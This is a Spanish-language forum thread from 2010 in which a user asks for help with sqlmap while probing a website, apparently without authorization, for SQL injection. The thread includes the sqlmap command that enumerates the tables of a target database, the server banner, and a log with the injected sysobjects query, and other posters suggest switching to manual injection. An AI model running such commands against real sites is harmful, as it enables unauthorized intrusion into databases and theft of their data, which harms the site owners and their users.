Ayuda con Sqlmap

Iniciado por N_q_N, 10 Diciembre 2010, 14:04 PM

0 Miembros y 1 Visitante están viendo este tema.

N_q_N

Buenas, les comento mi situación. Estoy analizando un site que podría ser vulnerable a Sql injection, utilizo Sqlmap y logro ver una DB, luego quiero extraer las Tablas y me dice que tiene 14 tablas pero me aparecen todas vacías y no puedo continuar:
Ejecuto esto:

sudo ./sqlmap.py -u "http://www.sitevulnerable.com/noticias_ampliar.asp?id=579" --tables -D TTBD

y me salen las 14 tablas vacías....

banner:
---
Microsoft SQL Server  2000 - 8.00.760 (Intel X86)
   Dec 17 2002 14:22:05
   Copyright (c) 1988-2003 Microsoft Corporation
   Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---

current database:    'TTBD'

Database: TTBD
[14 tables]
+--+
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
+--+

3st3

Esta dificil me manda un error

[15:34:17] [INFO] retrieved: 14
[15:36:03] [INFO] performed 20 queries in 105 seconds
[15:36:03] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) AND name NOT IN (SELECT TOP 0 name FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) ORDER BY name ASC) ORDER BY name ASC
[15:36:03] [INFO] retrieved: [15:36:04] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request

Avisa si lo has solucionado
Saludos

N_q_N

Aún no, pero voy a intentar con alguna otra herramienta de sql i.
Y aparte sólo aparece esa BD.

Gracias igual

EvilGoblin

probaste manualmente atacar a ver q resultados tenias?
Experimental Serial Lain [Linux User]

berz3k

Las tablas y rows son enormes y tarda en compilar toda la info, os recomiendo encontrar el inject y de ahi partir de forma manual.

-berz3k.